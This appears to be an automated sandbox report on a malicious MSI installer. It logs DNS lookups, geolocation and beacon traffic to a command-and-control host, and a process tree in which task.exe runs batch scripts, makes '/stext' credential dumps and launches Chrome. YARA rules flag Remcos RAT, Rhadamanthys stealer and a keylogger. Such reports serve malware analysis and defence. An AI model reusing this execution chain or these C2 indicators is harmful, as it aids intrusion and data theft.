| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 21, 2024 11:26:51.066031933 CET | 192.168.2.9 | 1.1.1.1 | 0xc059 | Standard query (0) | rm.anonbaba.net | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:26:55.007359028 CET | 192.168.2.9 | 1.1.1.1 | 0xfc11 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:13.991122007 CET | 192.168.2.9 | 1.1.1.1 | 0x67ed | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:13.992580891 CET | 192.168.2.9 | 1.1.1.1 | 0xe294 | Standard query (0) | time-a-g.nist.gov | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:13.992774963 CET | 192.168.2.9 | 1.1.1.1 | 0x639e | Standard query (0) | ts1.aco.net | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:13.992835045 CET | 192.168.2.9 | 1.1.1.1 | 0x3496 | Standard query (0) | ntp.nict.jp | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:13.993098974 CET | 192.168.2.9 | 1.1.1.1 | 0x72c8 | Standard query (0) | ntp.time.in.ua | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:13.993211031 CET | 192.168.2.9 | 1.1.1.1 | 0xca91 | Standard query (0) | ntp1.net.berkeley.edu | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.099360943 CET | 192.168.2.9 | 1.1.1.1 | 0xdeed | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.099833965 CET | 192.168.2.9 | 1.1.1.1 | 0x5448 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.100174904 CET | 192.168.2.9 | 1.1.1.1 | 0x5abb | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.100630999 CET | 192.168.2.9 | 1.1.1.1 | 0x4cc1 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 21, 2024 11:26:51.315473080 CET | 1.1.1.1 | 192.168.2.9 | 0xc059 | No error (0) | rm.anonbaba.net | | 179.43.171.197 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:26:55.234137058 CET | 1.1.1.1 | 192.168.2.9 | 0xfc11 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.217262983 CET | 1.1.1.1 | 192.168.2.9 | 0x67ed | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.219158888 CET | 1.1.1.1 | 192.168.2.9 | 0xe294 | No error (0) | time-a-g.nist.gov | | 129.6.15.28 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.219232082 CET | 1.1.1.1 | 192.168.2.9 | 0x72c8 | No error (0) | ntp.time.in.ua | | 62.149.0.30 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.219321966 CET | 1.1.1.1 | 192.168.2.9 | 0x3496 | No error (0) | ntp.nict.jp | | 61.205.120.130 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.219321966 CET | 1.1.1.1 | 192.168.2.9 | 0x3496 | No error (0) | ntp.nict.jp | | 133.243.238.163 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.219321966 CET | 1.1.1.1 | 192.168.2.9 | 0x3496 | No error (0) | ntp.nict.jp | | 133.243.238.244 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.219321966 CET | 1.1.1.1 | 192.168.2.9 | 0x3496 | No error (0) | ntp.nict.jp | | 133.243.238.164 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.219321966 CET | 1.1.1.1 | 192.168.2.9 | 0x3496 | No error (0) | ntp.nict.jp | | 133.243.238.243 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.220230103 CET | 1.1.1.1 | 192.168.2.9 | 0xca91 | No error (0) | ntp1.net.berkeley.edu | | 169.229.128.134 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:14.232342958 CET | 1.1.1.1 | 192.168.2.9 | 0x639e | No error (0) | ts1.aco.net | | 193.171.23.163 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.325759888 CET | 1.1.1.1 | 192.168.2.9 | 0xdeed | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.325759888 CET | 1.1.1.1 | 192.168.2.9 | 0xdeed | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.325839996 CET | 1.1.1.1 | 192.168.2.9 | 0x5abb | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.325839996 CET | 1.1.1.1 | 192.168.2.9 | 0x5abb | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.326067924 CET | 1.1.1.1 | 192.168.2.9 | 0x5448 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false |
| Nov 21, 2024 11:27:27.326612949 CET | 1.1.1.1 | 192.168.2.9 | 0x4cc1 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false |
• geoplugin.net

Session ID: 0
Source IP: 192.168.2.9
Source Port: 49717
Destination IP: 178.237.33.50
Destination Port: 80
PID: 6316
Process: C:\Users\user\task.exe

Timestamp: Nov 21, 2024 11:26:55.359579086 CET
Bytes transferred: 71
Direction: OUT
Data:
GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Timestamp: Nov 21, 2024 11:26:56.599136114 CET
Bytes transferred: 1170
Direction: IN
Data:
HTTP/1.1 200 OK
date: Thu, 21 Nov 2024 10:26:56 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID: 0
Source IP: 192.168.2.9
Source Port: 49740
Destination IP: 179.43.171.196
Destination Port: 443
PID: 1872
Process: C:\Windows\System32\dllhost.exe

Timestamp: 2024-11-21 10:27:44 UTC
Bytes transferred: 2
Direction: OUT
Data Raw: 0d 0a
Data Ascii:

Timestamp: 2024-11-21 10:27:44 UTC
Bytes transferred: 169
Direction: OUT
Data Raw: 74 d8 f6 08 2f 86 9d 90 1d 01 a1 43 00 a1 53 01 a1 42 ce 67 3e f9 9e a1 50 91 86 a1 4e d9 26 7b 45 33 42 39 32 45 41 41 2d 46 35 43 37 2d 34 37 46 38 2d 41 34 38 37 2d 46 34 36 36 46 34 32 30 33 35 41 31 7d a1 44 d9 2a 49 6e 74 65 6c 28 52 29 20 38 32 35 37 34 4c 20 47 69 67 61 62 69 74 20 4e 65 74 77 6f 72 6b 20 43 6f 6e 6e 65 63 74 69 6f 6e a1 41 ab 31 39 32 2e 31 36 38 2e 32 2e 39 a1 4b ad 32 35 35 2e 32 35 35 2e 32 35 35 2e 30 a1 4d c4 06 ec f4 bb 45 f6 9d a1 47 ab 31 39 32 2e 31 36 38 2e 32 2e 31
Data Ascii: t/CSBg>PN&{E3B92EAA-F5C7-47F8-A487-F466F42035A1}D*Intel(R) 82574L Gigabit Network ConnectionA192.168.2.9K255.255.255.0MEG192.168.2.1



                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:05:26:32
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\wE1inOhJA5.msi"
                                                                                                                                                              Imagebase:0x7ff63ebe0000
                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:05:26:32
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                              Imagebase:0x7ff63ebe0000
                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:05:26:33
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6
                                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:4
                                                                                                                                                              Start time:05:26:34
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                                                                                                                              Imagebase:0x910000
                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                              MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:05:26:34
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:05:26:34
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                                                                                                                              Imagebase:0xbd0000
                                                                                                                                                              File size:53'248 bytes
                                                                                                                                                              MD5 hash:544B0DBFF3F393BCE8BB9D815F532D51
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:7
                                                                                                                                                              Start time:05:26:35
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:05:26:36
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:05:26:39
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                                                                                                                                                              Imagebase:0xc50000
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:05:26:39
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:05:26:39
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 976
                                                                                                                                                              Imagebase:0x160000
                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files"
                                                                                                                                                              Imagebase:0xc50000
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:17
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:18
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                                                                                                                                                              Imagebase:0x7ff7fb2c0000
                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:19
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                                                                                                                              Imagebase:0x910000
                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                              MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:22
                                                                                                                                                              Start time:05:26:50
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"task.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:24
                                                                                                                                                              Start time:05:26:57
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:25
                                                                                                                                                              Start time:05:26:57
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\task.exe
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000003.1674900501.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000003.1662192131.0000000000580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:26
                                                                                                                                                              Start time:05:26:57
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:27
                                                                                                                                                              Start time:05:26:57
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

Target ID:28
Start time:05:26:58
Start date:21/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
Imagebase:0x7ff7fb2c0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:05:26:58
Start date:21/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:05:26:58
Start date:21/11/2024
Path:C:\Users\user\task.exe
Wow64 process (32bit):true
Commandline:"task.exe"
Imagebase:0x400000
File size:40'376 bytes
MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:31
Start time:05:26:59
Start date:21/11/2024
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\svchost.exe"
Imagebase:0xcb0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001F.00000003.1672134784.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001F.00000002.1765068419.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:32
Start time:05:27:08
Start date:21/11/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\svchost.exe"
Imagebase:0x7ff77afe0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:05:27:17
Start date:21/11/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chrFE01.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/6c77fc35"
Imagebase:0x7ff6b2cb0000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:05:27:18
Start date:21/11/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
